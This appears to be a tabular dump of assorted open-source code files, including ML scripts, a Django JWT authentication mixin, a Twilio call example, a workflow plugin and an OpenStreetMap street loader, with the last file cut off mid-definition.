max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars)
---|---|---|---|---|
tests/r/test_intqrt.py | hajime9652/observations | 199 | 11089058 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.intqrt import intqrt
def test_intqrt():
"""Test module intqrt.py by downloading
intqrt.csv and testing shape of
extracted data has 124 rows and 23 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = intqrt(test_path)
try:
assert x_train.shape == (124, 23)
except Exception:
shutil.rmtree(test_path)
raise
|
test/964-default-iface-init-generated/util-src/generate_java.py | lifansama/xposed_art_n | 234 | 11089099 | #!/usr/bin/python3
#
# Copyright (C) 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Generate java test files for test 964.
"""
import os
import sys
from pathlib import Path
BUILD_TOP = os.getenv("ANDROID_BUILD_TOP")
if BUILD_TOP is None:
print("ANDROID_BUILD_TOP not set. Please run build/envsetup.sh", file=sys.stderr)
sys.exit(1)
# Allow us to import utils and mixins.
sys.path.append(str(Path(BUILD_TOP)/"art"/"test"/"utils"/"python"))
from testgen.utils import get_copyright, subtree_sizes, gensym, filter_blanks
import testgen.mixins as mixins
from functools import total_ordering
import itertools
import string
# The max depth the tree can have.
MAX_IFACE_DEPTH = 3
class MainClass(mixins.DumpMixin, mixins.Named, mixins.JavaFileMixin):
"""
A Main.java file containing the Main class and the main function. It will run
all the test functions we have.
"""
MAIN_CLASS_TEMPLATE = """{copyright}
class Main {{
{test_groups}
{main_func}
}}
"""
MAIN_FUNCTION_TEMPLATE = """
public static void main(String[] args) {{
{test_group_invoke}
}}
"""
TEST_GROUP_INVOKE_TEMPLATE = """
{test_name}();
"""
def __init__(self):
"""
Initialize this MainClass. We start out with no tests.
"""
self.tests = set()
def add_test(self, ty):
"""
Add a test for the concrete type 'ty'
"""
self.tests.add(Func(ty))
def get_expected(self):
"""
Get the expected output of this test.
"""
all_tests = sorted(self.tests)
return filter_blanks("\n".join(a.get_expected() for a in all_tests))
def get_name(self):
"""
Gets the name of this class
"""
return "Main"
def __str__(self):
"""
Print the java code for this test.
"""
all_tests = sorted(self.tests)
test_invoke = ""
test_groups = ""
for t in all_tests:
test_groups += str(t)
for t in all_tests:
test_invoke += self.TEST_GROUP_INVOKE_TEMPLATE.format(test_name=t.get_name())
main_func = self.MAIN_FUNCTION_TEMPLATE.format(test_group_invoke=test_invoke)
return self.MAIN_CLASS_TEMPLATE.format(copyright = get_copyright('java'),
test_groups = test_groups,
main_func = main_func)
class Func(mixins.Named, mixins.NameComparableMixin):
"""
A function that tests the functionality of a concrete type. Should only be
constructed by MainClass.add_test.
"""
TEST_FUNCTION_TEMPLATE = """
public static void {fname}() {{
try {{
System.out.println("About to initialize {tree}");
{farg} v = new {farg}();
System.out.println("Initialized {tree}");
v.touchAll();
System.out.println("All of {tree} hierarchy initialized");
return;
}} catch (Error e) {{
e.printStackTrace(System.out);
return;
}}
}}
"""
OUTPUT_FORMAT = """
About to initialize {tree}
{initialize_output}
Initialized {tree}
{touch_output}
All of {tree} hierarchy initialized
""".strip()
def __init__(self, farg):
"""
Initialize a test function for the given argument
"""
self.farg = farg
def __str__(self):
"""
Print the java code for this test function.
"""
return self.TEST_FUNCTION_TEMPLATE.format(fname=self.get_name(),
farg=self.farg.get_name(),
tree = self.farg.get_tree())
def get_name(self):
"""
Gets the name of this test function
"""
return "TEST_FUNC_{}".format(self.farg.get_name())
def get_expected(self):
"""
Get the expected output of this function.
"""
return self.OUTPUT_FORMAT.format(
tree = self.farg.get_tree(),
initialize_output = self.farg.get_initialize_output().strip(),
touch_output = self.farg.get_touch_output().strip())
class TestClass(mixins.DumpMixin, mixins.Named, mixins.NameComparableMixin, mixins.JavaFileMixin):
"""
A class that will be instantiated to test interface initialization order.
"""
TEST_CLASS_TEMPLATE = """{copyright}
public class {class_name} implements {ifaces} {{
public void marker() {{
return;
}}
public void touchAll() {{
{touch_calls}
}}
}}
"""
TOUCH_CALL_TEMPLATE = """
System.out.println("{class_name} touching {iface_name}");
{iface_name}.field.touch();
"""
TOUCH_OUTPUT_TEMPLATE = """
{class_name} touching {iface_name}
{touch_output}
""".strip()
def __init__(self, ifaces):
"""
Initialize this test class which implements the given interfaces
"""
self.ifaces = ifaces
self.class_name = "CLASS_"+gensym()
def get_name(self):
"""
Gets the name of this interface
"""
return self.class_name
def get_tree(self):
"""
Print out a representation of the type tree of this class
"""
return "[{fname} {iftree}]".format(fname = self.get_name(), iftree = print_tree(self.ifaces))
def get_initialize_output(self):
return "\n".join(map(lambda i: i.get_initialize_output().strip(), dump_tree(self.ifaces)))
def get_touch_output(self):
return "\n".join(map(lambda a: self.TOUCH_OUTPUT_TEMPLATE.format(
class_name = self.class_name,
iface_name = a.get_name(),
touch_output = a.get_touch_output()).strip(),
self.get_all_interfaces()))
def get_all_interfaces(self):
"""
Returns a set of all interfaces this class transitively implements
"""
return sorted(set(dump_tree(self.ifaces)))
def __str__(self):
"""
Print the java code for this class.
"""
j_ifaces = ', '.join(map(lambda a: a.get_name(), self.ifaces))
touches = '\n'.join(map(lambda a: self.TOUCH_CALL_TEMPLATE.format(class_name = self.class_name,
iface_name = a.get_name()),
self.get_all_interfaces()))
return self.TEST_CLASS_TEMPLATE.format(copyright = get_copyright('java'),
ifaces = j_ifaces,
class_name = self.class_name,
touch_calls = touches)
class TestInterface(mixins.DumpMixin, mixins.Named, mixins.NameComparableMixin, mixins.JavaFileMixin):
"""
An interface that will be used to test default method resolution order.
"""
TEST_INTERFACE_TEMPLATE = """{copyright}
public interface {class_name} {extends} {ifaces} {{
public static final Displayer field = new Displayer("{tree}");
public void marker();
{funcs}
}}
"""
DEFAULT_FUNC_TEMPLATE = """
public default void {class_name}_DEFAULT_FUNC() {{ return; }}
"""
OUTPUT_TEMPLATE = "initialization of {tree}"
def __init__(self, ifaces, default):
"""
Initialize interface with the given super-interfaces
"""
self.ifaces = ifaces
self.default = default
end = "_DEFAULT" if default else ""
self.class_name = "INTERFACE_"+gensym()+end
self.cloned = False
self.initialized = False
def clone(self):
"""
Clones this interface, returning a new one with the same structure but
different name.
"""
return TestInterface(tuple(map(lambda a: a.clone(), self.ifaces)), self.default)
def get_name(self):
"""
Gets the name of this interface
"""
return self.class_name
def __iter__(self):
"""
Performs depth-first traversal of the interface tree this interface is the
root of. Does not filter out repeats.
"""
for i in self.ifaces:
yield i
yield from i
def get_tree(self):
"""
Print out a representation of the type tree of this class
"""
return "[{class_name} {iftree}]".format(class_name = self.get_name(),
iftree = print_tree(self.ifaces))
def get_initialize_output(self):
"""
Returns the expected output upon the class that implements this interface being initialized.
"""
if self.default and not self.initialized:
self.initialized = True
return self.OUTPUT_TEMPLATE.format(tree = self.get_tree())
else:
return ""
def get_touch_output(self):
"""
Returns the expected output upon this interface being touched.
"""
if not self.default and not self.initialized:
self.initialized = True
return self.OUTPUT_TEMPLATE.format(tree = self.get_tree())
else:
return ""
def __str__(self):
"""
Print the java code for this interface.
"""
j_ifaces = ', '.join(map(lambda a: a.get_name(), self.ifaces))
if self.default:
funcs = self.DEFAULT_FUNC_TEMPLATE.format(class_name = self.class_name)
else:
funcs = ""
return self.TEST_INTERFACE_TEMPLATE.format(copyright = get_copyright('java'),
extends = "extends" if len(self.ifaces) else "",
ifaces = j_ifaces,
funcs = funcs,
tree = self.get_tree(),
class_name = self.class_name)
def dump_tree(ifaces):
"""
Yields all the interfaces transitively implemented by the set in
reverse-depth-first order
"""
for i in ifaces:
yield from dump_tree(i.ifaces)
yield i
def print_tree(ifaces):
"""
Prints the tree for the given ifaces.
"""
return " ".join(i.get_tree() for i in ifaces)
def clone_all(l):
return tuple(a.clone() for a in l)
# Cached output of subtree_sizes for speed of access.
SUBTREES = [set(tuple(l) for l in subtree_sizes(i))
for i in range(MAX_IFACE_DEPTH + 1)]
def create_test_classes():
"""
Yield all the test classes with the different interface trees
"""
for num in range(1, MAX_IFACE_DEPTH + 1):
for split in SUBTREES[num]:
ifaces = []
for sub in split:
ifaces.append(list(create_interface_trees(sub)))
for supers in itertools.product(*ifaces):
yield TestClass(clone_all(supers))
for i in range(len(set(dump_tree(supers)) - set(supers))):
ns = clone_all(supers)
selected = sorted(set(dump_tree(ns)) - set(ns))[i]
yield TestClass(tuple([selected] + list(ns)))
def create_interface_trees(num):
"""
Yield all the interface trees up to 'num' depth.
"""
if num == 0:
yield TestInterface(tuple(), False)
yield TestInterface(tuple(), True)
return
for split in SUBTREES[num]:
ifaces = []
for sub in split:
ifaces.append(list(create_interface_trees(sub)))
for supers in itertools.product(*ifaces):
yield TestInterface(clone_all(supers), False)
yield TestInterface(clone_all(supers), True)
# TODO Should add on some from higher up the tree.
def create_all_test_files():
"""
Creates all the objects representing the files in this test. They just need to
be dumped.
"""
mc = MainClass()
classes = {mc}
for clazz in create_test_classes():
classes.add(clazz)
for i in dump_tree(clazz.ifaces):
classes.add(i)
mc.add_test(clazz)
return mc, classes
def main(argv):
java_dir = Path(argv[1])
if not java_dir.exists() or not java_dir.is_dir():
print("{} is not a valid java dir".format(java_dir), file=sys.stderr)
sys.exit(1)
expected_txt = Path(argv[2])
mainclass, all_files = create_all_test_files()
with expected_txt.open('w') as out:
print(mainclass.get_expected(), file=out)
for f in all_files:
f.dump(java_dir)
if __name__ == '__main__':
main(sys.argv)
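# Usage sketch, inferred from main() above (paths are placeholders): the script
# takes a target directory for the generated .java files and a path for the
# expected-output file, and ANDROID_BUILD_TOP must point at an AOSP checkout.
#
#   ./generate_java.py ./test-gen-src ./expected.txt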
|
examples/books_to_scrape/persistence/__init__.py | awesome-archive/transistor | 232 | 11089111 | # -*- coding: utf-8 -*-
"""
transistor.examples.books_to_scrape.persistence
~~~~~~~~~~~~
This module serves as an example of how to setup a persistence model for Transistor
with postgresql + newt.db.
:copyright: Copyright (C) 2018 by BOM Quote Limited
:license: The MIT License, see LICENSE for more details.
~~~~~~~~~~~~
"""
from .serialization import BookItems, BookItemsLoader
from .newt_db import ndb |
qinhaifang/src/tools/demo_seg_mss.py | SpaceNetChallenge/BuildingFootprintDetectors | 161 | 11089191 | #!/usr/bin/python
# --------------------------------------------------------
# Multitask Network Cascade
# Modified from py-faster-rcnn (https://github.com/rbgirshick/py-faster-rcnn)
# Copyright (c) 2016, <NAME>
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
# Standard module
import os
import shutil
import argparse
import time
import cv2
import numpy as np
# User-defined module
import _init_paths
import caffe
from mnc_config import cfg
from transform.bbox_transform import clip_boxes
from utils.blob import prep_im_for_blob, im_list_to_blob,im_list_to_blob_mss
from transform.mask_transform import gpu_mask_voting
#import matplotlib.pyplot as plt
from utils.vis_seg import _convert_pred_to_image, _get_voc_color_map
from PIL import Image
from osgeo import gdal
# spaceNet classes
CLASSES = ('building',)
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='MNC demo')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default='./models/VGG16/mnc_5stage/test_maskSeg.prototxt', type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default='./vgg16_mnc_instanceSeg_iter_2000.caffemodel', type=str)
parser.add_argument('--datapath', dest='data_path',
help='path to save testdata',
default=cfg.ROOT_DIR +'/data/VOCdevkitSDS', type=str)
parser.add_argument('--respath', dest='res_path',
help='path to save test results',
default=cfg.ROOT_DIR +'/test_reuslts', type=str)
args = parser.parse_args()
return args
def prepare_mnc_args(im, im_mss, net):
# Prepare image data blob
blobs = {'data': None}
processed_ims = []
im, im_scale_factors = \
prep_im_for_blob(im, cfg.PIXEL_MEANS, cfg.TEST.SCALES[0], cfg.TRAIN.MAX_SIZE)
im_mss_data = im_mss.ReadAsArray()
im_mss_data = np.transpose(im_mss_data,(1,2,0))
blobs['data'] = im_list_to_blob_mss(im,im_mss_data)
# Prepare image info blob
im_scales = [np.array(im_scale_factors)]
assert len(im_scales) == 1, 'Only single-image batch implemented'
im_blob = blobs['data']
blobs['im_info'] = np.array(
[[im_blob.shape[2], im_blob.shape[3], im_scales[0]]],
dtype=np.float32)
# Reshape network inputs and do forward
net.blobs['data'].reshape(*blobs['data'].shape)
net.blobs['im_info'].reshape(*blobs['im_info'].shape)
forward_kwargs = {
'data': blobs['data'].astype(np.float32, copy=False),
'im_info': blobs['im_info'].astype(np.float32, copy=False)
}
return forward_kwargs, im_scales
def im_detect(im, im_mss, net):
forward_kwargs, im_scales = prepare_mnc_args(im, im_mss, net)
blobs_out = net.forward(**forward_kwargs)
# output we need to collect:
# 1. output from phase1'
rois_phase1 = net.blobs['rois'].data.copy()
#print 'rois_phase1:{}'.format(rois_phase1.shape)
masks_phase1 = net.blobs['mask_proposal'].data[...]
scores_phase1 = net.blobs['seg_cls_prob'].data[...]
# 2. output from phase2
'''
rois_phase2 = net.blobs['rois_ext'].data[...]
masks_phase2 = net.blobs['mask_proposal_ext'].data[...]
scores_phase2 = net.blobs['seg_cls_prob_ext'].data[...]
'''
# Boxes are in resized space, we un-scale them back
rois_phase1 = rois_phase1[:, 1:5] / im_scales[0]
rois_phase1, _ = clip_boxes(rois_phase1, im.shape)
masks = masks_phase1
boxes = rois_phase1
scores = scores_phase1
return boxes, masks, scores
def get_vis_dict(result_box, result_mask, img_name, cls_names, vis_thresh=0.3):
box_for_img = []
mask_for_img = []
cls_for_img = []
for cls_ind, cls_name in enumerate(cls_names):
det_for_img = result_box[cls_ind]
seg_for_img = result_mask[cls_ind]
#print 'det_for_img:{}'.format(det_for_img[:,-1])
keep_inds = np.where(det_for_img[:, -1] >= vis_thresh)[0]
for keep in keep_inds:
box_for_img.append(det_for_img[keep])
mask_for_img.append(seg_for_img[keep][0])
cls_for_img.append(cls_ind + 1)
res_dict = {'image_name': img_name,
'cls_name': cls_for_img,
'boxes': box_for_img,
'masks': mask_for_img}
return res_dict
if __name__ == '__main__':
args = parse_args()
test_prototxt = args.prototxt
test_model = args.caffemodel
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
net = caffe.Net(test_prototxt, test_model, caffe.TEST)
# _, _, _ = im_detect(im, net)
im_file = open(os.path.join(args.data_path,'val.txt'),'r')
im_names = im_file.readlines()
data_path = os.path.join(args.data_path,'img')
data_path_mss = os.path.join(args.data_path,'img_8band')
res_path = args.res_path
if os.path.isdir(res_path):
shutil.rmtree(res_path)
os.mkdir(res_path)
for img_name in im_names:
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
img_name = img_name.strip()
im_name = os.path.join(img_name + '.tif')
im_name_mss = '8' + im_name[1::]
print 'Demo for data/demo/{}'.format(im_name)
print os.path.join(data_path,im_name)
gt_image = os.path.join(data_path, im_name)
im = cv2.imread(gt_image)
im_mss = gdal.Open(os.path.join(data_path_mss,im_name_mss))
start = time.time()
boxes, masks, seg_scores = im_detect(im, im_mss, net)
print 'boxes{},masks{},seg_scores{}'.format(boxes.shape,masks.shape,seg_scores.shape)
print 'boxes{}'.format(boxes.shape)
end = time.time()
print 'forward time %f' % (end-start)
result_mask, result_box = gpu_mask_voting(masks, boxes, seg_scores, len(CLASSES) + 1,
300, im.shape[1], im.shape[0])
pred_dict = get_vis_dict(result_box, result_mask, data_path + im_name, CLASSES)
img_width = im.shape[1]
img_height = im.shape[0]
inst_img, cls_img = _convert_pred_to_image(img_width, img_height, pred_dict)
color_map = _get_voc_color_map()
target_cls_file = os.path.join(res_path, 'cls_maskSeg_' + img_name +'.jpg')
cls_out_img = np.zeros((img_height, img_width, 3))
for i in xrange(img_height):
for j in xrange(img_width):
cls_out_img[i][j] = color_map[cls_img[i][j]][::-1]
cv2.imwrite(target_cls_file, cls_out_img)
background = Image.open(gt_image)
#boxx = (0,0,200,200)
#background = background.crop(boxx)
mask = Image.open(target_cls_file)
background = background.convert('RGBA')
mask = mask.convert('RGBA')
superimpose_image = Image.blend(background, mask, 0.4)
superimpose_name = os.path.join(res_path, 'final_maskSeg_' + img_name + '.jpg')
superimpose_image.save(superimpose_name, 'JPEG')
print superimpose_name
|
examples/dataflow-production-ready/python/ml_preproc/pipeline/model/data_classes.py | ruchirjain86/professional-services | 2,116 | 11089198 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from typing import Iterable
# The CSV header; used to derive the field names and to filter the header row out of the data.
HEADER = 'source_address;source_city;target_address;target_city'
# Here we return field names that are not duplicated and can be used with a named tuple.
def _input_fields(header: str, sep: str = ";"):
return header.split(sep)
# Because writing a data class is boring, named tuples just make it much easier
Record = namedtuple('Record', _input_fields(HEADER))
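# Quick sketch of the resulting Record type (values below are made up):
#
#   r = Record(*'221B Baker St;London;742 Evergreen Terrace;Springfield'.split(';'))
#   r.source_city   # 'London'
#   r.target_city   # 'Springfield'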
def line2record(line: str, sep: str = ";") -> Iterable[Record]:
""" Transform a line of data into a Record.
Args:
line: A line from the CSV data file
sep: The separator used in the line. Default is ;
Returns:
object:
A Record object
"""
elements = line.split(sep)
return Record(*elements) |
test/models/tensorflow/frozen_op_graph/tf_frozen.py | lynex/nnfusion | 639 | 11089214 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import tensorflow as tf
import numpy as np
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import graph_io
tf.reset_default_graph()
# input tensor
x0 = tf.placeholder(tf.float32, shape=[1, 3, 2, 2])
x1 = tf.placeholder(tf.float32, shape=[3, 3, 2, 1])
y = tf.nn.depthwise_conv2d(x0, x1, strides=[1,1,1,1], padding='SAME', name='depthwise_conv2d')
with tf.Session() as s:
resdata = s.run(y, feed_dict={x0:[[[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]], x1:[[[[1], [2]], [[7], [8]], [[13], [14]]], [[[3], [4]], [[9], [10]], [[15], [16]]], [[[5], [6]], [[11], [12]], [[17], [18]]]]})
print("result=", list(resdata))
g = s.graph
g_def = g.as_graph_def()
g_def_const = graph_util.convert_variables_to_constants(input_graph_def=g_def, output_node_names=["depthwise_conv2d"], sess=s)
graph_io.write_graph(as_text=False, name="depthwise_conv2d.pb", logdir="./",graph_or_graph_def=g_def_const)
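# Sketch of reading the frozen graph back in, assuming the same TF 1.x API used
# above; the tensor name follows from the op name passed to depthwise_conv2d.
#
#   graph_def = tf.GraphDef()
#   with tf.gfile.GFile("depthwise_conv2d.pb", "rb") as f:
#       graph_def.ParseFromString(f.read())
#   with tf.Graph().as_default() as g:
#       tf.import_graph_def(graph_def, name="")
#       y_loaded = g.get_tensor_by_name("depthwise_conv2d:0")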
|
jwt_auth/mixins.py | sundeepkumar/django-jwt-auth-master | 175 | 11089225 | from django.http import HttpResponse
import jwt
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from jwt_auth import settings, exceptions
from jwt_auth.utils import get_authorization_header
from jwt_auth.compat import json, smart_text, User
jwt_decode_handler = settings.JWT_DECODE_HANDLER
jwt_get_user_id_from_payload = settings.JWT_PAYLOAD_GET_USER_ID_HANDLER
class JSONWebTokenAuthMixin(object):
"""
Token based authentication using the JSON Web Token standard.
Clients should authenticate by passing the token key in the "Authorization"
HTTP header, prepended with the string specified in the setting
`JWT_AUTH_HEADER_PREFIX`. For example:
Authorization: JWT <KEY>
"""
www_authenticate_realm = 'api'
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
try:
request.user, request.token = self.authenticate(request)
except exceptions.AuthenticationFailed as e:
response = HttpResponse(
json.dumps({'errors': [str(e)]}),
status=401,
content_type='application/json'
)
response['WWW-Authenticate'] = self.authenticate_header(request)
return response
return super(JSONWebTokenAuthMixin, self).dispatch(
request, *args, **kwargs)
def authenticate(self, request):
auth = get_authorization_header(request).split()
auth_header_prefix = settings.JWT_AUTH_HEADER_PREFIX.lower()
if not auth or smart_text(auth[0].lower()) != auth_header_prefix:
raise exceptions.AuthenticationFailed()
if len(auth) == 1:
msg = 'Invalid Authorization header. No credentials provided.'
raise exceptions.AuthenticationFailed(msg)
elif len(auth) > 2:
msg = ('Invalid Authorization header. Credentials string '
'should not contain spaces.')
raise exceptions.AuthenticationFailed(msg)
try:
payload = jwt_decode_handler(auth[1])
except jwt.ExpiredSignature:
msg = 'Signature has expired.'
raise exceptions.AuthenticationFailed(msg)
except jwt.DecodeError:
msg = 'Error decoding signature.'
raise exceptions.AuthenticationFailed(msg)
user = self.authenticate_credentials(payload)
return (user, auth[1])
def authenticate_credentials(self, payload):
"""
Returns an active user that matches the payload's user id and email.
"""
try:
user_id = jwt_get_user_id_from_payload(payload)
if user_id:
user = User.objects.get(pk=user_id, is_active=True)
else:
msg = 'Invalid payload'
raise exceptions.AuthenticationFailed(msg)
except User.DoesNotExist:
msg = 'Invalid signature'
raise exceptions.AuthenticationFailed(msg)
return user
def authenticate_header(self, request):
"""
Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return 'JWT realm="{0}"'.format(self.www_authenticate_realm)
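# Minimal usage sketch (hypothetical view, not part of this module): the mixin is
# meant to sit in front of a regular Django class-based view, which then sees
# request.user and request.token already populated by dispatch() above.
#
#   from django.http import JsonResponse
#   from django.views.generic import View
#
#   class ProtectedView(JSONWebTokenAuthMixin, View):
#       def get(self, request):
#           return JsonResponse({'username': request.user.username})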
|
hypergan/layers/pixel_shuffle.py | limberc/HyperGAN | 889 | 11089235 | import torch.nn as nn
from hypergan.layer_shape import LayerShape
import hypergan as hg
class PixelShuffle(hg.Layer):
"""
---
description: 'layer pixel_shuffle for configurable component'
---
# pixel_shuffle layer
Implements PixelShuffle https://pytorch.org/docs/master/generated/torch.nn.PixelShuffle.html
## input size
Any 4-d tensor of the form `[B, C, H, W]`
## output size
A 4d-tensor of the form `[B, C//4, H*2, W*2]`
## syntax
```json
"pixel_shuffle"
```
"""
def __init__(self, component, args, options):
super(PixelShuffle, self).__init__(component, args, options)
self.shuffle = nn.PixelShuffle(2)
self.dims = list(component.current_size.dims).copy()
def output_size(self):
return LayerShape(self.dims[0]//4, self.dims[1]*2, self.dims[2]*2)
def forward(self, input, context):
return self.shuffle(input)
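# Shape sketch for the wrapped op (plain PyTorch, independent of the hypergan
# wiring above): with upscale_factor=2, channels shrink by 4 and the spatial
# dims double, matching the docstring.
#
#   import torch
#   torch.nn.PixelShuffle(2)(torch.randn(1, 8, 4, 4)).shape   # torch.Size([1, 2, 8, 8])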
|
rest/subaccounts/voice-example/subaccount-call.6.x.py | Tshisuaka/api-snippets | 234 | 11089262 | # Download the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
sub_account_sid = os.environ['TWILIO_ACCOUNT_SID']
sub_auth_token = os.environ['TWILIO_AUTH_TOKEN']
sub_account_client = Client(sub_account_sid, sub_auth_token)
url = 'http://twimlets.com/message?' + \
'Message%5B0%5D=Hello%20from%20your%20subaccount'
# Make a call from your subaccount
sub_account_client.api.account.calls.create(
from_='+14158141829', to='+16518675310', url=url
)
|
mmseg/core/seg/sampler/__init__.py | HeqingZhang/mmsegmentation | 903 | 11089273 | from .base_pixel_sampler import BasePixelSampler
from .ohem_pixel_sampler import OHEMPixelSampler
__all__ = ['BasePixelSampler', 'OHEMPixelSampler']
|
src/dispatch/plugins/generic_workflow/plugin.py | axellaurelut/dispatch | 3,417 | 11089285 | """
.. module: dispatch.plugins.generic_workflow.plugin
:platform: Unix
:copyright: (c) 2021 by <NAME>.
:license: MIT, see LICENSE for more details.
:description:
The rest API needs to respond with JSON according to the JSON schema mentioned here
https://github.com/Netflix/dispatch/issues/1722#issuecomment-947863678
For example:
{
"status": "Completed", # String<Running, Completed, Failed>
"artifacts": [{
"evergreen": False,
"evergreen_owner": None,
"evergreen_reminder_interval": 90,
"evergreen_last_reminder_at": None,
"resource_type": None,
"resource_id": None,
"weblink": "https://www.example.com",
"description": "Description",
"name": "Logfile20211020",
"created_at": "2021-10-20 20:50:00",
"updated_at": "2021-10-20 20:50:00"
}],
"weblink": "https://www.twitter.com", #String<WorkflowURL>,
}
"""
import logging
import requests
import json
from pydantic import Field, SecretStr, HttpUrl
from tenacity import TryAgain, retry, stop_after_attempt, wait_exponential
from dispatch.config import BaseConfigurationModel
from dispatch.decorators import apply, counter, timer
from dispatch.plugins import generic_workflow as generic_workflow_plugin
from dispatch.plugins.bases import WorkflowPlugin
class GenericWorkflowConfiguration(BaseConfigurationModel):
"""
Generic Workflow configuration
You can enter an REST API endpoint here that gets called when a workflow needs to either run or return its status.
Run results in a POST request with a JSON payload containing workflow_id and params.
The status of a workflow is retrieved with a GET request using the following query string parameters:
workflow_id, workflow_instance_id, incident_id and incident_name.
"""
api_url: HttpUrl = Field(
title="API URL", description="This API endpoint to GET or POST workflow info from/to."
)
auth_header: SecretStr = Field(
title="Authorization Header",
description="For example: Bearer: JWT token, or basic: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
@apply(counter, exclude=["__init__"])
@apply(timer, exclude=["__init__"])
class GenericWorkflowPlugin(WorkflowPlugin):
title = "Generic Workflow Plugin - Workflow Management"
slug = "generic-workflow"
description = "A generic workflow plugin that calls an API endpoint to kick-off a workflow and retrieve the status of a workflow."
version = generic_workflow_plugin.__version__
author = "<NAME>"
author_url = "https://github.com/jtorvald/"
def __init__(self):
WorkflowPlugin.__init__(self)
self.configuration_schema = GenericWorkflowConfiguration
@retry(stop=stop_after_attempt(3), wait=wait_exponential(multiplier=1, min=1, max=10))
def get_workflow_instance(
self,
workflow_id: str,
workflow_instance_id: int,
incident_id: int,
incident_name: str,
**kwargs,
):
api_url = self.configuration.api_url
headers = {
"Content-Type": "application/json",
"Authorization": self.configuration.auth_header.get_secret_value(),
}
fields = {
"workflow_id": workflow_id,
"workflow_instance_id": workflow_instance_id,
"incident_id": incident_id,
"incident_name": incident_name,
}
resp = requests.get(api_url, params=fields, headers=headers)
if resp.status_code in [429, 500, 502, 503, 504]:
raise TryAgain
return resp.json()
@retry(stop=stop_after_attempt(3), wait=wait_exponential(multiplier=1, min=1, max=10))
def run(self, workflow_id: str, params: dict, **kwargs):
logging.info("Run on generic workflow %s, %s", params, kwargs)
api_url = self.configuration.api_url
obj = {"workflow_id": workflow_id, "params": params}
headers = {
"Content-Type": "application/json",
"Authorization": self.configuration.auth_header.get_secret_value(),
}
resp = requests.post(api_url, data=json.dumps(obj), headers=headers)
if resp.status_code in [429, 500, 502, 503, 504]:
raise TryAgain
return resp.json()
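# Rough sketch of a matching endpoint (illustrative only; Flask is an arbitrary
# choice and the handler body is a placeholder). It mirrors the contract in the
# module docstring: POST runs a workflow, GET reports its status.
#
#   from flask import Flask, jsonify, request
#   app = Flask(__name__)
#
#   @app.route("/workflow", methods=["GET", "POST"])
#   def workflow():
#       if request.method == "POST":
#           body = request.get_json()   # {"workflow_id": ..., "params": {...}}
#           return jsonify({"status": "Running", "artifacts": [], "weblink": ""})
#       # GET query string: workflow_id, workflow_instance_id, incident_id, incident_name
#       return jsonify({"status": "Completed", "artifacts": [], "weblink": ""})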
|
src/data/osm/street_loader.py | grischard/OSMDeepOD | 156 | 11089298 | import logging
from src.base.node import Node
from src.base.street import Street
from src.base.tag import Tag
from src.data.osm.overpass_api import OverpassApi
logger = logging.getLogger(__name__)
class StreetLoader:
street_categories = [
'road',
'trunk',
'primary',
'secondary',
'tertiary',
'unclassified',
'residential',
'service',
'trunk_link',
'primary_link',
'secondary_link',
'tertiary_link',
'pedestrian']
def __init__(self, categories=None):
self.api = OverpassApi()
self._add([] if categories is None else categories)
self.tags = self._generate_tags()
def load_data(self, bbox):
data = self.api.get(bbox, self.tags)
return self._generate_street(data)
def _add(self, categories):
for category in categories:
self.street_categories.append(category)
def _generate_tags(self):
tags = []
for category in self.street_categories:
tags.append(Tag(key='highway', value=category))
return tags
@staticmethod
def _generate_street(data):
streets = []
for feature in data['features']:
coordinates = feature['geometry']['coordinates']
nodes = []
for coordinate in coordinates:
try:
lat, lon = coordinate[1], coordinate[0]
except TypeError:
logger.exception("failed to unpack coordinate")
logger.warning("feature was: {}, coordinate was: {}".format(feature, coordinate))
else:
nodes.append(Node(lat, lon))
streets.append(Street(nodes))
return streets
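# Usage sketch: the bbox argument is whatever OverpassApi.get expects from
# src.base, so it is only named here, not constructed.
#
#   loader = StreetLoader(categories=['footway'])
#   streets = loader.load_data(bbox)   # list of Street objects built from OSM ways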
|
torchtext/models/roberta/transforms.py | nateanl/text | 3,172 | 11089378 | import os
import torch
from torch.nn import Module
from torchtext._download_hooks import load_state_dict_from_url
from torchtext import transforms
from torchtext import functional
from typing import List, Any
class XLMRobertaModelTransform(Module):
def __init__(
self,
vocab_path: str,
spm_model_path: str,
bos_token: str = "<s>",
